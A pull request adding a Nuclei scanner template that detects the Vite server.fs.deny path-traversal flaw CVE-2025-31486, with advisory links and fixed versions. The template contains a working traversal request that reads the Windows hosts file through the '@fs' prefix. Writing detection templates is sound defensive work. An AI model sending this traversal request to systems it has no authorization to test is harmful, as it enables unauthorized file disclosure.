### PR TITLE
add CVE-2025-31486

### DIFF
--- a/http/cves/2025/CVE-2025-31486.yaml
+++ b/http/cves/2025/CVE-2025-31486.yaml
@@ -1,0 +1,42 @@
+id: CVE-2025-31486
+
+info:
+  name: Vite server.fs.deny Bypass - Local File Inclusion
+  author: wn147
+  severity: medium
+  description: |
+    Vite is vulnerable to a path traversal vulnerability, allowing an attacker to access sensitive files on the file system via the @fs prefix combined with specific URL parsing quirks.
+  reference:
+    - https://github.com/advisories/GHSA-xcj6-pq6g-qj4x
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-31486
+  remediation: |
+    Update Vite to version 4.5.12, 5.4.17, 6.0.14, 6.1.4, 6.2.5 or later.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cve-id: CVE-2025-31486
+    cwe-id: CWE-22
+  tags: cve,cve2025,vite,lfi,traversal,ghsa
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/@fs/C:/Users/gjswn/vite-vuln-test/?/../../../../../Windows/System32/drivers/etc/hosts?import&raw"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "Content-Type: application/javascript"
+
+      - type: word
+        part: body
+        words:
+          - "export default"
+          - "Microsoft Corp"
+        condition: and


### PR DESCRIPTION
### Template / PR Information

This PR adds a Nuclei template for the Vite `server.fs.deny` bypass vulnerability, which allows for Local File Inclusion.

- Added CVE-2025-31486
- References:
  - https://github.com/advisories/GHSA-xcj6-pq6g-qj4x
  - https://nvd.nist.gov/vuln/detail/CVE-2025-31486

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

The vulnerability is triggered by using a specific URL structure that confuses the server's path normalization, such as `/@fs/?/../../...`. The provided template has been successfully tested against a vulnerable Vite v4.5.11 instance on Windows.


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)